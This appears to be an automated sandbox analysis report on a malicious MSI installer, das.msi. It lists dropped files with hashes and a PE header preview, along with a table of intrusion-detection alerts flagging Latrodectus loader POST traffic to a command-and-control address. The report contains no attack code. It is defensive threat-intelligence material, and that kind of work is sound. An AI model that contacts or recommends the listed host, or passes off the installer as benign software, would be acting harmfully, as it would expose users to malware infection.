                                                                                                                                                                                                                                                SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                                                                                                                                                                                SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                                                                                                                                                                                SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.1618398199562698
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:JSbX72FjZAGiLIlHVRpqh/7777777777777777777777777vDHFegQygvKpZl0i5:JHQI56NEF
                                                                                                                                                                                                                                                MD5:BB46B9A4E65F80A4BDE73FF1B5AAB4D4
                                                                                                                                                                                                                                                SHA1:9A7E626DA2C848DCDDD03939A778DBA54D2ABF02
                                                                                                                                                                                                                                                SHA-256:7BB3B290F9BE21BA651FBC7BF7F480D51F4A312516D6C10F9E21ACBE8C25961A
                                                                                                                                                                                                                                                SHA-512:B2A88A07D4F54723026796E4BB2FE03CD38F8B80C612D6CEF01D0DBC629CDF4ABF9140CC1886409151F4BAE0C79AD821FD9C014B9B50D8B66C1E28CB8A7D6843
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.5505568132384608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Q8Ph0uRc06WXJenT5F5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:/h011nT7dI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:8DD15CCFC0DB4BA31DE71BDDAD16B815
                                                                                                                                                                                                                                                SHA1:F44D80159BCB856F3AE7A23EF16282891FD45AAA
                                                                                                                                                                                                                                                SHA-256:C1981BE6C444539FE669CB729A26B96125196DB5435D49F78F3AAD7EDDC54F0F
                                                                                                                                                                                                                                                SHA-512:23E7BEA8B3396CD939BB01A24F145F0E783DB3552D8A52016E2C988F88BCC0F8795B2640ECFCA39B830B422B6A4E3052E5E0333BFC89314F937F73C74FEFF157
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):360001
                                                                                                                                                                                                                                                Entropy (8bit):5.362967240123241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauU:zTtbmkExhMJCIpEN
                                                                                                                                                                                                                                                MD5:DAFC755B7973130713F9A9CF7527FA22
                                                                                                                                                                                                                                                SHA1:B8E96B03CD8E67B04FABBB317B367CADE0BAE238
                                                                                                                                                                                                                                                SHA-256:21ADE0CA189868210835D4F30857B6737BF13C8D8C9AEF330BBB78110464933C
                                                                                                                                                                                                                                                SHA-512:7BEEC058EC0F1EE9650A7716EF97BAC08CD1B9795652C477A4B82E99F90A74B5F8887DDBF0F6230B80EFC994676E30D4EDC3F15CED2D15D32AB271ACA7F1237C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):1.2441267557716325
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2R18ukwM+CFXJ9T5N5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:m8PVTzdI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:4C69146D9BDD7FFE36BCAD4EFFA2C937
                                                                                                                                                                                                                                                SHA1:B65FA676711AE6F34948056E8170EEBC6433966D
                                                                                                                                                                                                                                                SHA-256:B91E575D9ECE097A2E991E692462F484BA4817506B54C38031B66898C2045268
                                                                                                                                                                                                                                                SHA-512:1BF1710E51995CA11306A90242269534F017A28DF86A7159A713204D608316F80CEC4FDC3F4CF65D4340D2196D7821892FDEF5EE7A31F700B1AF7E7C4879CA26
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.5505568132384608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Q8Ph0uRc06WXJenT5F5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:/h011nT7dI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:8DD15CCFC0DB4BA31DE71BDDAD16B815
                                                                                                                                                                                                                                                SHA1:F44D80159BCB856F3AE7A23EF16282891FD45AAA
                                                                                                                                                                                                                                                SHA-256:C1981BE6C444539FE669CB729A26B96125196DB5435D49F78F3AAD7EDDC54F0F
                                                                                                                                                                                                                                                SHA-512:23E7BEA8B3396CD939BB01A24F145F0E783DB3552D8A52016E2C988F88BCC0F8795B2640ECFCA39B830B422B6A4E3052E5E0333BFC89314F937F73C74FEFF157
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):73728
                                                                                                                                                                                                                                                Entropy (8bit):0.13277496856556628
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:5NxSAhMgETxQoRqipVQoRwQoRqipVQoRYAEVQoyjCyEVqewGiJq+pU5+:5NxvVETS6qS+6n6qS+6YAE+lCyEMKv5
                                                                                                                                                                                                                                                MD5:BED7342D36622C6704983EB4BD9DAE29
                                                                                                                                                                                                                                                SHA1:D7D794AEE88ECA46CC597899BF0D01A6670ED6D8
                                                                                                                                                                                                                                                SHA-256:18F5403DF1D84E49432FA50A320DC24C5C2BE2C4E6D207046D769AEB70343352
                                                                                                                                                                                                                                                SHA-512:204A654E5D19376008D48DC846A9E597B1AF010330F50576AE0E289EE9661F37592657B38CB965A8F58370EDC938CA3634477344184FDCBDC21FB87B12BE71BC
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):1.2441267557716325
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2R18ukwM+CFXJ9T5N5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:m8PVTzdI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:4C69146D9BDD7FFE36BCAD4EFFA2C937
                                                                                                                                                                                                                                                SHA1:B65FA676711AE6F34948056E8170EEBC6433966D
                                                                                                                                                                                                                                                SHA-256:B91E575D9ECE097A2E991E692462F484BA4817506B54C38031B66898C2045268
                                                                                                                                                                                                                                                SHA-512:1BF1710E51995CA11306A90242269534F017A28DF86A7159A713204D608316F80CEC4FDC3F4CF65D4340D2196D7821892FDEF5EE7A31F700B1AF7E7C4879CA26
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):20480
                                                                                                                                                                                                                                                Entropy (8bit):1.5505568132384608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Q8Ph0uRc06WXJenT5F5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:/h011nT7dI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:8DD15CCFC0DB4BA31DE71BDDAD16B815
                                                                                                                                                                                                                                                SHA1:F44D80159BCB856F3AE7A23EF16282891FD45AAA
                                                                                                                                                                                                                                                SHA-256:C1981BE6C444539FE669CB729A26B96125196DB5435D49F78F3AAD7EDDC54F0F
                                                                                                                                                                                                                                                SHA-512:23E7BEA8B3396CD939BB01A24F145F0E783DB3552D8A52016E2C988F88BCC0F8795B2640ECFCA39B830B422B6A4E3052E5E0333BFC89314F937F73C74FEFF157
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):1.2441267557716325
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2R18ukwM+CFXJ9T5N5TI6qS+6YAE+lCyEMT6qS+6GTkvNxv:m8PVTzdI6qr6nZlCoT6qr6j7
                                                                                                                                                                                                                                                MD5:4C69146D9BDD7FFE36BCAD4EFFA2C937
                                                                                                                                                                                                                                                SHA1:B65FA676711AE6F34948056E8170EEBC6433966D
                                                                                                                                                                                                                                                SHA-256:B91E575D9ECE097A2E991E692462F484BA4817506B54C38031B66898C2045268
                                                                                                                                                                                                                                                SHA-512:1BF1710E51995CA11306A90242269534F017A28DF86A7159A713204D608316F80CEC4FDC3F4CF65D4340D2196D7821892FDEF5EE7A31F700B1AF7E7C4879CA26
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):0.06822024312274416
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOegQygvjkE6Vky6lZ:2F0i8n0itFzDHFegQygvHZ
                                                                                                                                                                                                                                                MD5:DFC9B5741A0924E1DD12D9A16FBEE03B
                                                                                                                                                                                                                                                SHA1:A2D44CEE526724E855EA2699FDE7E4BAFDF5187D
                                                                                                                                                                                                                                                SHA-256:3F48AD558A640289F2C5C6E354FDC536C9720A93CBAC3FA9AA96C982D3012D9A
                                                                                                                                                                                                                                                SHA-512:CB703B74113E493618977160FEC0E6FA64DB857A94E84153CABB430FF75D37F3DEDF6D4FD5ECCD10D29C1F413CE7A0490BC4A6A775D91E02B0D9AA904A7A8E67
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {26C6701E-5BA5-48FD-87C5-16BC3575B429}, Number of Words: 10, Subject: GloryDory, Author: OrbitalMast LLC, Name of Creating Application: GloryDory, Template: ;1033, Comments: This installer database contains the logic and data required to install GloryDory., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                                                                                                                                                                                Entropy (8bit):7.187836999350755
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                                                                                                                                                                                • Microsoft Windows Installer (60509/1) 46.00%
                                                                                                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                                                                                                                                                                                File name:das.msi
                                                                                                                                                                                                                                                File size:1'669'120 bytes
                                                                                                                                                                                                                                                MD5:3cb6b99b20930ac0dbadc10899dc511e
                                                                                                                                                                                                                                                SHA1:570c4ab78cf4bb22b78aac215a4a79189d4fa9ed
                                                                                                                                                                                                                                                SHA256:ea1792f689bfe5ad3597c7f877b66f9fcf80d732e5233293d52d374d50cab991
                                                                                                                                                                                                                                                SHA512:aedf58ea01d59cce191cb9c0f83dbdbf7e3e8f049c764b577d6a957cb5229c50dda7ec6760ca43ad4dbdb085ae02b07bc818f69ca08373243019af6683e4931c
                                                                                                                                                                                                                                                SSDEEP:49152:5Sj3YhW8zBQSc0ZnSKSZKumZr7A+zafUWM1q:oYY0ZnQK/A7fQ
                                                                                                                                                                                                                                                TLSH:D375D0227386C537C96E01303A2AD66B5579FCB74B3140DBA3C8291E9EB44D16739FA3
                                                                                                                                                                                                                                                Icon Hash:2d2e3797b32b2b99
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-03T20:46:23.711911+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62255 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:26.100541+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62257 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:27.207379+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62258 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:28.269400+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62259 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:29.404610+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62261 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:30.513577+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62263 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:32.022400+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62265 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:33.059468+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62267 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:34.597775+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62270 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:35.666259+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62271 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:37.202295+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62272 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:38.255571+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62273 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:39.373531+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62274 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:40.447990+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62276 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:41.511634+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62278 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:42.995957+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62279 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:44.030722+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62282 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:45.864454+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62284 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:47.025591+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62286 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:48.260455+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62289 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:49.298261+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62290 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:50.349763+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62291 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:52.308439+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62293 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:53.858658+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62296 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:54.910875+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62297 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:57.049622+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62300 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:58.113573+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62304 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:46:59.212721+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62306 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:00.221486+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62307 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:01.259683+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62308 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:02.284847+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62310 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:03.732492+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62313 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:04.881395+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62314 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:06.129772+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62315 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:07.674325+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62318 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:08.802832+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62320 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:11.834943+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62321 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:13.008328+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62323 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:14.178016+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62326 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:15.980420+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62329 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:16.984355+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62331 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:18.458657+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62332 | 188.114.97.3 | 443 | TCP |
| 2024-10-03T20:47:19.565813+0200 | 2048735 | ET MALWARE Latrodectus Loader Related Activity (POST) | 1 | 192.168.2.7 | 62334 | 188.114.97.3 | 443 | TCP |
                                                                                                                                                                                                                                                2024-10-03T20:47:20.736109+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762337188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:21.712455+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762338188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:23.221995+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762339188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:24.278384+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762340188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:25.556024+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762341188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:26.721847+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762344188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:27.729852+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762346188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:28.950593+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762347188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:30.020614+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762348188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:31.476587+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762351188.114.97.3443TCP
                                                                                                                                                                                                                                                2024-10-03T20:47:32.614704+02002048735ET MALWARE Latrodectus Loader Related Activity (POST)1192.168.2.762353188.114.97.3443TCP
